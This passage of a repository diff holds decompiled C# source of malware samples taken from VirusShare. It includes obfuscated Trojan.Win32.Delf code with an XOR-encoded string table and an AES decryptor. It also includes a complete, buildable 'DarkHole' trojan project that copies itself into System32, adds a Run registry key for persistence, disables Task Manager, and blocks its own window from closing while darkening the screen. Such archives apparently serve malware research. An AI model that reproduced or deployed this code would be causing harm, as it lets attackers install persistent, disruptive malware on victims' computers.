\u0012 = 1,
\u0011 = 2,
\u000F = 4,
\u0013 = 8,
\u0003 = 16, // 0x00000010
\u0004 = 512, // 0x00000200
\u0010 = 1024, // 0x00000400
\u0008 = 2048, // 0x00000800
\u000E = 4096, // 0x00001000
\u0015 = 65536, // 0x00010000
\u0006 = 262144, // 0x00040000
\u0014 = 524288, // 0x00080000
\u0001 = 16777216, // 0x01000000
\u0007 = 33554432, // 0x02000000
\u0002 = 67108864, // 0x04000000
\u0005 = 134217728, // 0x08000000
}
private struct \u000F
{
public uint \u0001;
public string \u0001;
public string \u0002;
public string \u0003;
public uint \u0002;
public uint \u0003;
public uint \u0004;
public uint \u0005;
public uint \u0006;
public uint \u0007;
public uint \u0008;
public uint \u000E;
public short \u0001;
public short \u0002;
public IntPtr \u0001;
public IntPtr \u0002;
public IntPtr \u0003;
public IntPtr \u0004;
}
private delegate bool \u0010([In] IntPtr obj0, [In] ref \u0003.\u0003 obj1);
private struct \u0011
{
public ushort \u0001;
public ushort \u0002;
public ushort \u0003;
public ushort \u0004;
public ushort \u0005;
public ushort \u0006;
public ushort \u0007;
public ushort \u0008;
public ushort \u000E;
public ushort \u000F;
public ushort \u0010;
public ushort \u0011;
public ushort \u0012;
public ushort \u0013;
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 4)]
public ushort[] \u0001;
public ushort \u0014;
public ushort \u0015;
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 10)]
public ushort[] \u0002;
public int \u0001;
}
private delegate bool \u0012(
[In] IntPtr obj0,
[In] IntPtr obj1,
[In] uint obj2,
[In] \u0003.\u0006 obj3,
[In] \u0003.\u0005 obj4);
private delegate bool \u0013([In] IntPtr obj0, [In] IntPtr obj1);
private struct \u0014
{
public uint \u0001;
public \u0003.\u0001 \u0001;
public \u0003.\u0019 \u0001;
}
private struct \u0015
{
public uint \u0001;
public uint \u0002;
}
private delegate uint \u0016([In] IntPtr obj0);
private struct \u0017
{
public uint \u0001;
public uint \u0002;
public uint \u0003;
public uint \u0004;
public uint \u0005;
public uint \u0006;
public uint \u0007;
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 80)]
public byte[] \u0001;
public uint \u0008;
}
private delegate bool \u0018(
[In] string obj0,
[In] string obj1,
[In] IntPtr obj2,
[In] IntPtr obj3,
[In] bool obj4,
[In] \u0003.\u000E obj5,
[In] IntPtr obj6,
[In] string obj7,
[In] ref \u0003.\u000F obj8,
[In] ref \u0003.\u0004 obj9);
private struct \u0019
{
public ushort \u0001;
public byte \u0001;
public byte \u0002;
public uint \u0001;
public uint \u0002;
public uint \u0003;
public uint \u0004;
public uint \u0005;
public uint \u0006;
public uint \u0007;
public uint \u0008;
public uint \u000E;
public ushort \u0002;
public ushort \u0003;
public ushort \u0004;
public ushort \u0005;
public ushort \u0006;
public ushort \u0007;
public uint \u000F;
public uint \u0010;
public uint \u0011;
public uint \u0012;
public ushort \u0008;
public ushort \u000E;
public uint \u0013;
public uint \u0014;
public uint \u0015;
public uint \u0016;
public uint \u0017;
public uint \u0018;
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 16)]
public \u0003.\u0015[] \u0001;
}
}
}
MSIL/Trojan/Win32/D/Trojan.Win32.Delf.cjha-09fdf048be5ee692c4b7f67dcd746d321697af807f132f1e395c35c2bc7d244c/_0005/_0001.cs
+52
View File
@@ -0,0 +1,52 @@
// Decompiled with JetBrains decompiler
// Type: .
// Assembly: Explorer, Version=1.0.0.0, Culture=neutral, PublicKeyToken=1133f7a8419a0062
// MVID: 9EBACA4B-5CC4-4E1D-BB8B-A34A1921D651
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan.Win32.Delf.cjha-09fdf048be5ee692c4b7f67dcd746d321697af807f132f1e395c35c2bc7d244c.exe
using \u0005;
using System;
using System.IO;
using System.IO.Compression;
using System.Runtime.InteropServices;
using System.Security.Cryptography;
using System.Text;
namespace \u0005
{
internal class \u0001
{
private static byte[] \u0003([In] byte[] obj0, [In] string obj1)
{
Rfc2898DeriveBytes rfc2898DeriveBytes = new Rfc2898DeriveBytes(obj1, new byte[8]);
return new RijndaelManaged().CreateDecryptor(rfc2898DeriveBytes.GetBytes(32), rfc2898DeriveBytes.GetBytes(16)).TransformFinalBlock(obj0, 0, obj0.Length);
}
private static byte[] \u0003([In] byte[] obj0)
{
MemoryStream memoryStream1 = new MemoryStream(obj0);
MemoryStream memoryStream2 = new MemoryStream();
byte[] buffer = new byte[1024];
using (DeflateStream deflateStream = new DeflateStream((Stream) memoryStream1, CompressionMode.Decompress, true))
{
while (true)
{
int count = deflateStream.Read(buffer, 0, buffer.Length);
if (count > 0)
memoryStream2.Write(buffer, 0, count);
else
break;
}
}
return memoryStream2.ToArray();
}
public static byte[] \u0003([In] string obj0, [In] string obj1) => \u0001.\u0003(\u0001.\u0003(Encoding.Default.GetBytes(obj0), obj1));
[DllImport("kernel32", EntryPoint = "GetProcAddress")]
public static extern IntPtr \u0003([In] IntPtr obj0, [In] string obj1);
[DllImport("kernel32", EntryPoint = "GetModuleHandle")]
public static extern IntPtr \u0003([In] string obj0);
}
}
MSIL/Trojan/Win32/D/Trojan.Win32.Delf.cjha-09fdf048be5ee692c4b7f67dcd746d321697af807f132f1e395c35c2bc7d244c/_0005/_0002.cs
+298
View File
@@ -0,0 +1,298 @@
// Decompiled with JetBrains decompiler
// Type: .
// Assembly: Explorer, Version=1.0.0.0, Culture=neutral, PublicKeyToken=1133f7a8419a0062
// MVID: 9EBACA4B-5CC4-4E1D-BB8B-A34A1921D651
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan.Win32.Delf.cjha-09fdf048be5ee692c4b7f67dcd746d321697af807f132f1e395c35c2bc7d244c.exe
using \u0005;
using System.Runtime.InteropServices;
using System.Text;
namespace \u0005
{
[StructLayout(LayoutKind.Auto, CharSet = CharSet.Auto)]
internal class \u0002
{
internal static \u0002.\u0001 \u0001;
internal static byte[] \u0001;
internal static string[] \u0001 = new string[15];
private static string \u0003([In] int obj0, [In] int obj1, [In] int obj2)
{
string str = Encoding.Default.GetString(\u0002.\u0001, obj1, obj2);
\u0002.\u0001[obj0] = str;
return str;
}
public static string \u0003() => \u0002.\u0001[0] ?? \u0002.\u0003(0, 0, 12);
public static string \u0004() => \u0002.\u0001[1] ?? \u0002.\u0003(1, 12, 13);
public static string \u0005() => \u0002.\u0001[2] ?? \u0002.\u0003(2, 25, 12);
public static string \u0006() => \u0002.\u0001[3] ?? \u0002.\u0003(3, 37, 12);
public static string \u0007() => \u0002.\u0001[4] ?? \u0002.\u0003(4, 49, 14);
public static string \u0008() => \u0002.\u0001[5] ?? \u0002.\u0003(5, 63, 18);
public static string \u000E() => \u0002.\u0001[7] ?? \u0002.\u0003(7, 110, 14);
public static string \u000F() => \u0002.\u0001[8] ?? \u0002.\u0003(8, 124, 9);
public static string \u0010() => \u0002.\u0001[9] ?? \u0002.\u0003(9, 133, 20);
public static string \u0011() => \u0002.\u0001[10] ?? \u0002.\u0003(10, 153, 14);
public static string \u0012() => \u0002.\u0001[11] ?? \u0002.\u0003(11, 167, 18);
public static string \u0013() => \u0002.\u0001[12] ?? \u0002.\u0003(12, 185, 16);
public static string \u0014() => \u0002.\u0001[13] ?? \u0002.\u0003(13, 201, 16);
public static string \u0015() => \u0002.\u0001[14] ?? \u0002.\u0003(14, 217, 12);
static \u0002()
{
\u0002.\u0001 = new byte[229]
{
(byte) 149,
(byte) 154,
(byte) 142,
(byte) 147,
(byte) 159,
(byte) 151,
(byte) 203,
(byte) 203,
(byte) 216,
(byte) 147,
(byte) 152,
(byte) 153,
(byte) 180,
(byte) 154,
(byte) 158,
(byte) 149,
(byte) 188,
(byte) 138,
(byte) 159,
(byte) 130,
(byte) 159,
(byte) 153,
(byte) 139,
(byte) 140,
(byte) 167,
(byte) 171,
(byte) 139,
(byte) 132,
(byte) 134,
(byte) 177,
(byte) 133,
(byte) 146,
(byte) 177,
(byte) 170,
(byte) 174,
(byte) 190,
(byte) 191,
(byte) 151,
(byte) 183,
(byte) 186,
(byte) 189,
(byte) 133,
(byte) 177,
(byte) 166,
(byte) 189,
(byte) 166,
(byte) 162,
(byte) 178,
(byte) 171,
(byte) 156,
(byte) 165,
(byte) 183,
(byte) 175,
(byte) 164,
(byte) 174,
(byte) 155,
(byte) 163,
(byte) 180,
(byte) 171,
(byte) 176,
(byte) 176,
(byte) 160,
(byte) 165,
(byte) 134,
(byte) 219,
(byte) 203,
(byte) 241,
(byte) 210,
(byte) 222,
(byte) 206,
(byte) 212,
(byte) 220,
(byte) 240,
(byte) 222,
(byte) 216,
(byte) 208,
(byte) 252,
(byte) 210,
(byte) 221,
(byte) 212,
(byte) 239,
(byte) 234,
(byte) 212,
(byte) 221,
(byte) 198,
(byte) 196,
(byte) 218,
(byte) 204,
(byte) 212,
(byte) 137,
(byte) 244,
(byte) 215,
(byte) 205,
(byte) 211,
(byte) 197,
(byte) 211,
(byte) 234,
(byte) 246,
(byte) 249,
(byte) 238,
(byte) 180,
(byte) 201,
(byte) 253,
(byte) 234,
(byte) 249,
(byte) 226,
(byte) 230,
(byte) 246,
(byte) 247,
(byte) 224,
(byte) 211,
(byte) 227,
(byte) 235,
(byte) 238,
(byte) 248,
(byte) 232,
(byte) 218,
(byte) 249,
(byte) 231,
(byte) 234,
(byte) 227,
(byte) 244,
(byte) 247,
(byte) 196,
(byte) 236,
(byte) 247,
(byte) 228,
(byte) 237,
(byte) 18,
(byte) 81,
(byte) 24,
(byte) 17,
(byte) 22,
(byte) 53,
(byte) 12,
(byte) 44,
(byte) 24,
(byte) 26,
(byte) 21,
(byte) 5,
(byte) 36,
(byte) 26,
(byte) 21,
(byte) 6,
(byte) 33,
(byte) 9,
(byte) 63,
(byte) 8,
(byte) 9,
(byte) 31,
(byte) 1,
(byte) 6,
(byte) 8,
(byte) 49,
(byte) 13,
(byte) 23,
(byte) 22,
(byte) 22,
(byte) 1,
(byte) 13,
(byte) 31,
(byte) 51,
(byte) 48,
(byte) 50,
(byte) 57,
(byte) 30,
(byte) 32,
(byte) 14,
(byte) 36,
(byte) 62,
(byte) 32,
(byte) 48,
(byte) 2,
(byte) 33,
(byte) 63,
(byte) 50,
(byte) 43,
(byte) 60,
(byte) 63,
(byte) 0,
(byte) 47,
(byte) 38,
(byte) 39,
(byte) 59,
(byte) 63,
(byte) 0,
(byte) 33,
(byte) 49,
(byte) 22,
(byte) 43,
(byte) 50,
(byte) 36,
(byte) 95,
(byte) 91,
(byte) 127,
(byte) 82,
(byte) 84,
(byte) 79,
(byte) 93,
(byte) 65,
(byte) 66,
(byte) 100,
(byte) 81,
(byte) 65,
(byte) 102,
(byte) 91,
(byte) 66,
(byte) 84,
(byte) 79,
(byte) 75,
(byte) 111,
(byte) 66,
(byte) 68,
(byte) 95,
(byte) 77,
(byte) 81,
(byte) 82,
(byte) 117,
(byte) 65,
(byte) 86,
(byte) 87,
(byte) 78,
(byte) 69,
(byte) 117,
(byte) 118,
(byte) 109,
(byte) 121,
(byte) 124,
(byte) 126
};
for (int index = 0; index < \u0002.\u0001.Length; ++index)
\u0002.\u0001[index] = (byte) ((int) \u0002.\u0001[index] ^ index ^ 1447847678);
}
[StructLayout(LayoutKind.Explicit, Size = 229, Pack = 1)]
private struct \u0001
{
}
}
}
MSIL/Trojan/Win32/D/Trojan.Win32.Delf.cjha-09fdf048be5ee692c4b7f67dcd746d321697af807f132f1e395c35c2bc7d244c/_003CModule_003E.cs
+16
View File
@@ -0,0 +1,16 @@
// Decompiled with JetBrains decompiler
// Type: <Module>
// Assembly: Explorer, Version=1.0.0.0, Culture=neutral, PublicKeyToken=1133f7a8419a0062
// MVID: 9EBACA4B-5CC4-4E1D-BB8B-A34A1921D651
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan.Win32.Delf.cjha-09fdf048be5ee692c4b7f67dcd746d321697af807f132f1e395c35c2bc7d244c.exe
using \u0001;
internal class \u003CModule\u003E
{
static \u003CModule\u003E()
{
\u0003.\u0001.\u0003();
\u0002.\u0003();
}
}
MSIL/Trojan/Win32/D/Trojan.Win32.Delf.cjha-09fdf048be5ee692c4b7f67dcd746d321697af807f132f1e395c35c2bc7d244c/{56732c33-a8ea-48e2-a548-0239f4aa8a0c}
BIN
View File
Binary file not shown.
MSIL/Trojan/Win32/D/Trojan.Win32.Delf.cjha-09fdf048be5ee692c4b7f67dcd746d321697af807f132f1e395c35c2bc7d244c/{9ebaca4b-5cc4-4e1d-bb8b-a34a1921d651}
BIN
View File
Binary file not shown.
MSIL/Trojan/Win32/D/Trojan.Win32.Disabler.ag-8f832a067f0cbed927d9eb2ca683e9473f989c4db136e10b5039182fc621175b/ADarkHole.cs
+94
View File
@@ -0,0 +1,94 @@
// Decompiled with JetBrains decompiler
// Type: DarkHole.ADarkHole
// Assembly: DarkHole, Version=1.0.2863.37165, Culture=neutral, PublicKeyToken=null
// MVID: 004179F3-0653-4C47-86BC-65D9EC044824
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan.Win32.Disabler.ag-8f832a067f0cbed927d9eb2ca683e9473f989c4db136e10b5039182fc621175b.exe
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using Microsoft.Win32;
using System;
using System.IO;
using System.Threading;
using System.Windows.Forms;
namespace DarkHole
{
public class ADarkHole
{
public frmMain frmHole;
public ADarkHole.AElipse Elipse;
public Thread threadProgressiveDarkHole;
public ADarkHole(ref frmMain frmHl)
{
this.Elipse = new ADarkHole.AElipse();
this.threadProgressiveDarkHole = new Thread(new ThreadStart(MainModule.ProgressiveDarkHole));
this.frmHole = frmHl;
this.frmHole.Height = Screen.PrimaryScreen.WorkingArea.Height;
this.frmHole.Width = Screen.PrimaryScreen.WorkingArea.Width;
this.frmHole.Top = 0;
this.frmHole.Left = 0;
this.Elipse.Top = checked ((int) Math.Round(unchecked ((double) this.frmHole.Height / 2.0)));
this.Elipse.Left = checked ((int) Math.Round(unchecked ((double) this.frmHole.Width / 2.0)));
this.Elipse.Height = checked ((int) Math.Round(unchecked ((double) this.frmHole.Height / 2.0 + 15.0)));
this.Elipse.Width = checked ((int) Math.Round(unchecked ((double) this.frmHole.Width / 2.0 + 15.0)));
this.TaskmanagerLock(true);
this.InfectMachine();
this.DoDarkHole();
Thread progressiveDarkHole = this.threadProgressiveDarkHole;
progressiveDarkHole.IsBackground = true;
progressiveDarkHole.Priority = ThreadPriority.Normal;
progressiveDarkHole.Start();
}
public void DoDarkHole()
{
this.frmHole.Text = Strings.Space(checked ((int) Math.Round(unchecked ((double) this.frmHole.Width / 10.0 - (double) "Dark Hole".Length)))) + "Dark Hole";
this.frmHole.BackColor = System.Drawing.Color.Black;
MainModule.SetWindowRgn(this.frmHole.Handle.ToInt32(), MainModule.CreateEllipticRgn(this.Elipse.Left, this.Elipse.Top, this.Elipse.Width, this.Elipse.Height), true);
}
public void DoDarkHole(int Top, int Left, int Height, int Width)
{
this.frmHole.Text = Strings.Space(checked ((int) Math.Round(unchecked ((double) this.frmHole.Width / 10.0 - (double) "Dark Hole".Length)))) + "Dark Hole";
this.frmHole.BackColor = System.Drawing.Color.Black;
MainModule.SetWindowRgn(this.frmHole.Handle.ToInt32(), MainModule.CreateEllipticRgn(Left, Top, Width, Height), true);
}
public void InfectMachine()
{
string str = Environment.SystemDirectory + "\\DarkHole.exe";
if (!File.Exists(str))
File.Copy(Application.ExecutablePath, str);
Registry.LocalMachine.OpenSubKey("SOFTWARE").OpenSubKey("Microsoft").OpenSubKey("Windows").OpenSubKey("CurrentVersion").OpenSubKey("run", true).SetValue("DarkHole", (object) (Environment.SystemDirectory + "\\DarkHole.exe"));
}
public void TaskmanagerLock(bool Locked)
{
RegistryKey registryKey = Registry.CurrentUser.OpenSubKey("SOFTWARE").OpenSubKey("Microsoft").OpenSubKey("Windows").OpenSubKey("CurrentVersion").OpenSubKey("Policies", true);
string[] subKeyNames = registryKey.GetSubKeyNames();
int lowerBound = subKeyNames.GetLowerBound(0);
int upperBound = subKeyNames.GetUpperBound(0);
int index = lowerBound;
while (index <= upperBound)
{
if (StringType.StrCmp(subKeyNames[index], "System", false) != 0)
checked { ++index; }
else
goto label_5;
}
registryKey.CreateSubKey("System");
label_5:
registryKey.OpenSubKey("System", true).SetValue("DisableTaskMgr", (object) -(Locked ? 1 : 0));
}
public struct AElipse
{
public int Width;
public int Height;
public int Top;
public int Left;
}
}
}
MSIL/Trojan/Win32/D/Trojan.Win32.Disabler.ag-8f832a067f0cbed927d9eb2ca683e9473f989c4db136e10b5039182fc621175b/AssemblyInfo.cs
+13
View File
@@ -0,0 +1,13 @@
using System;
using System.Reflection;
using System.Runtime.InteropServices;
[assembly: CLSCompliant(true)]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyDescription("Virtual Dark Hole")]
[assembly: Guid("56E082D2-B802-4403-8999-1B02044F9C6B")]
[assembly: AssemblyTitle("Dark Hole")]
[assembly: AssemblyCopyright("")]
[assembly: AssemblyProduct("Infection")]
[assembly: AssemblyCompany("")]
[assembly: AssemblyVersion("1.0.2863.37165")]
MSIL/Trojan/Win32/D/Trojan.Win32.Disabler.ag-8f832a067f0cbed927d9eb2ca683e9473f989c4db136e10b5039182fc621175b/MainModule.cs
+41
View File
@@ -0,0 +1,41 @@
// Decompiled with JetBrains decompiler
// Type: DarkHole.MainModule
// Assembly: DarkHole, Version=1.0.2863.37165, Culture=neutral, PublicKeyToken=null
// MVID: 004179F3-0653-4C47-86BC-65D9EC044824
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan.Win32.Disabler.ag-8f832a067f0cbed927d9eb2ca683e9473f989c4db136e10b5039182fc621175b.exe
using Microsoft.VisualBasic.CompilerServices;
using System.Runtime.InteropServices;
using System.Threading;
namespace DarkHole
{
[StandardModule]
internal sealed class MainModule
{
public static ADarkHole DarkHole;
[DllImport("gdi32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern int CreateEllipticRgn(int X1, int Y1, int X2, int Y2);
[DllImport("user32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern int SetWindowRgn(int hWnd, int hRgn, bool bRedraw);
[DllImport("kernel32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern int RegisterServiceProcess(int dwProcessID, int dwType);
public static void ProgressiveDarkHole()
{
while (MainModule.DarkHole.Elipse.Top > 0)
{
checked { --MainModule.DarkHole.Elipse.Top; }
checked { --MainModule.DarkHole.Elipse.Left; }
checked { ++MainModule.DarkHole.Elipse.Height; }
checked { ++MainModule.DarkHole.Elipse.Width; }
MainModule.DarkHole.DoDarkHole();
Thread.Sleep(300);
}
MainModule.SetWindowRgn(MainModule.DarkHole.frmHole.Handle.ToInt32(), 0, true);
}
}
}
MSIL/Trojan/Win32/D/Trojan.Win32.Disabler.ag-8f832a067f0cbed927d9eb2ca683e9473f989c4db136e10b5039182fc621175b/Trojan.Win32.Disabler.ag.csproj
+50
View File
@@ -0,0 +1,50 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan.Win32.Disabler.ag-8f832a067f0cbed927d9eb2ca683e9473f989c4db136e10b5039182fc621175b.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{6EA271A7-D36A-4B97-A7DD-83DB3D12BA9D}</ProjectGuid>
<OutputType>WinExe</OutputType>
<AssemblyName>DarkHole</AssemblyName>
<ApplicationVersion>1.0.2863.37165</ApplicationVersion>
<RootNamespace>DarkHole</RootNamespace>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Reference Include="Microsoft.VisualBasic" />
<Reference Include="System" />
<Reference Include="System.Data" />
<Reference Include="System.Drawing" />
<Reference Include="System.Windows.Forms" />
<Reference Include="System.Xml" />
</ItemGroup>
<ItemGroup>
<Compile Include="ADarkHole.cs" />
<Compile Include="frmMain.cs" />
<Compile Include="MainModule.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<ItemGroup>
<EmbeddedResource Include="frmMain.resx" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>
MSIL/Trojan/Win32/D/Trojan.Win32.Disabler.ag-8f832a067f0cbed927d9eb2ca683e9473f989c4db136e10b5039182fc621175b/Trojan.Win32.Disabler.ag.sln
+20
View File
@@ -0,0 +1,20 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "DarkHole", "Trojan.Win32.Disabler.ag-8f832a067f0cbed927d9eb2ca683e9473f989c4db136e10b5039182fc621175b.csproj", "{6EA271A7-D36A-4B97-A7DD-83DB3D12BA9D}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{6EA271A7-D36A-4B97-A7DD-83DB3D12BA9D}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{6EA271A7-D36A-4B97-A7DD-83DB3D12BA9D}.Debug|Any CPU.Build.0 = Debug|Any CPU
{6EA271A7-D36A-4B97-A7DD-83DB3D12BA9D}.Release|Any CPU.ActiveCfg = Release|Any CPU
{6EA271A7-D36A-4B97-A7DD-83DB3D12BA9D}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
MSIL/Trojan/Win32/D/Trojan.Win32.Disabler.ag-8f832a067f0cbed927d9eb2ca683e9473f989c4db136e10b5039182fc621175b/frmMain.cs
+61
View File
@@ -0,0 +1,61 @@
// Decompiled with JetBrains decompiler
// Type: DarkHole.frmMain
// Assembly: DarkHole, Version=1.0.2863.37165, Culture=neutral, PublicKeyToken=null
// MVID: 004179F3-0653-4C47-86BC-65D9EC044824
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan.Win32.Disabler.ag-8f832a067f0cbed927d9eb2ca683e9473f989c4db136e10b5039182fc621175b.exe
using System;
using System.ComponentModel;
using System.Diagnostics;
using System.Drawing;
using System.Windows.Forms;
namespace DarkHole
{
public class frmMain : Form
{
private IContainer components;
[STAThread]
public static void Main() => Application.Run((Form) new frmMain());
public frmMain()
{
this.Load += new EventHandler(this.Form_Load);
this.Closing += new CancelEventHandler(this.Form_Closing);
this.InitializeComponent();
}
protected override void Dispose(bool disposing)
{
if (disposing && this.components != null)
this.components.Dispose();
base.Dispose(disposing);
}
[DebuggerStepThrough]
private void InitializeComponent()
{
Size size = new Size(5, 14);
this.AutoScaleBaseSize = size;
size = new Size(96, 80);
this.ClientSize = size;
this.ControlBox = false;
this.Font = new Font("Tahoma", 8.25f, FontStyle.Regular, GraphicsUnit.Point, (byte) 0);
this.FormBorderStyle = FormBorderStyle.None;
this.Name = nameof (frmMain);
this.ShowInTaskbar = false;
this.StartPosition = FormStartPosition.CenterScreen;
this.Text = "Dark Hole";
this.TopMost = true;
}
private void Form_Load(object sender, EventArgs e)
{
frmMain frmHl = this;
MainModule.DarkHole = new ADarkHole(ref frmHl);
}
private void Form_Closing(object sender, CancelEventArgs e) => e.Cancel = true;
}
}
MSIL/Trojan/Win32/D/Trojan.Win32.Disabler.ag-8f832a067f0cbed927d9eb2ca683e9473f989c4db136e10b5039182fc621175b/frmMain.resx
+150
View File
@@ -0,0 +1,150 @@
<?xml version="1.0" encoding="utf-8"?>
<root>
<!--
Microsoft ResX Schema
Version 2.0
The primary goals of this format is to allow a simple XML format
that is mostly human readable. The generation and parsing of the
various data types are done through the TypeConverter classes
associated with the data types.
Example:
... ado.net/XML headers & schema ...
<resheader name="resmimetype">text/microsoft-resx</resheader>
<resheader name="version">2.0</resheader>
<resheader name="reader">System.Resources.ResXResourceReader, System.Windows.Forms, ...</resheader>
<resheader name="writer">System.Resources.ResXResourceWriter, System.Windows.Forms, ...</resheader>
<data name="Name1"><value>this is my long string</value><comment>this is a comment</comment></data>
<data name="Color1" type="System.Drawing.Color, System.Drawing">Blue</data>
<data name="Bitmap1" mimetype="application/x-microsoft.net.object.binary.base64">
<value>[base64 mime encoded serialized .NET Framework object]</value>
</data>
<data name="Icon1" type="System.Drawing.Icon, System.Drawing" mimetype="application/x-microsoft.net.object.bytearray.base64">
<value>[base64 mime encoded string representing a byte array form of the .NET Framework object]</value>
<comment>This is a comment</comment>
</data>
There are any number of "resheader" rows that contain simple
name/value pairs.
Each data row contains a name, and value. The row also contains a
type or mimetype. Type corresponds to a .NET class that support
text/value conversion through the TypeConverter architecture.
Classes that don't support this are serialized and stored with the
mimetype set.
The mimetype is used for serialized objects, and tells the
ResXResourceReader how to depersist the object. This is currently not
extensible. For a given mimetype the value must be set accordingly:
Note - application/x-microsoft.net.object.binary.base64 is the format
that the ResXResourceWriter will generate, however the reader can
read any of the formats listed below.
mimetype: application/x-microsoft.net.object.binary.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Binary.BinaryFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.soap.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Soap.SoapFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.bytearray.base64
value : The object must be serialized into a byte array
: using a System.ComponentModel.TypeConverter
: and then encoded with base64 encoding.
-->
<xsd:schema id="root" xmlns="" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:msdata="urn:schemas-microsoft-com:xml-msdata">
<xsd:import namespace="http://www.w3.org/XML/1998/namespace" />
<xsd:element name="root" msdata:IsDataSet="true">
<xsd:complexType>
<xsd:choice maxOccurs="unbounded">
<xsd:element name="metadata">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" />
</xsd:sequence>
<xsd:attribute name="name" use="required" type="xsd:string" />
<xsd:attribute name="type" type="xsd:string" />
<xsd:attribute name="mimetype" type="xsd:string" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="assembly">
<xsd:complexType>
<xsd:attribute name="alias" type="xsd:string" />
<xsd:attribute name="name" type="xsd:string" />
</xsd:complexType>
</xsd:element>
<xsd:element name="data">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
<xsd:element name="comment" type="xsd:string" minOccurs="0" msdata:Ordinal="2" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" msdata:Ordinal="1" />
<xsd:attribute name="type" type="xsd:string" msdata:Ordinal="3" />
<xsd:attribute name="mimetype" type="xsd:string" msdata:Ordinal="4" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="resheader">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" />
</xsd:complexType>
</xsd:element>
</xsd:choice>
</xsd:complexType>
</xsd:element>
</xsd:schema>
<resheader name="resmimetype">
<value>text/microsoft-resx</value>
</resheader>
<resheader name="version">
<value>2.0</value>
</resheader>
<resheader name="reader">
<value>System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
<resheader name="writer">
<value>System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
<data name="$this.SnapToGrid" mimetype="application/x-microsoft.net.object.binary.base64">
<value>AAEAAAD/////AQAAAAAAAAAEAQAAAA5TeXN0ZW0uQm9vbGVhbgEAAAAHbV92YWx1ZQABAQs=</value>
</data>
<data name="$this.TrayLargeIcon" mimetype="application/x-microsoft.net.object.binary.base64">
<value>AAEAAAD/////AQAAAAAAAAAEAQAAAA5TeXN0ZW0uQm9vbGVhbgEAAAAHbV92YWx1ZQABAAs=</value>
</data>
<data name="$this.Name" mimetype="application/x-microsoft.net.object.binary.base64">
<value>B2ZybU1haW4=</value>
</data>
<data name="$this.DefaultModifiers" mimetype="application/x-microsoft.net.object.binary.base64">
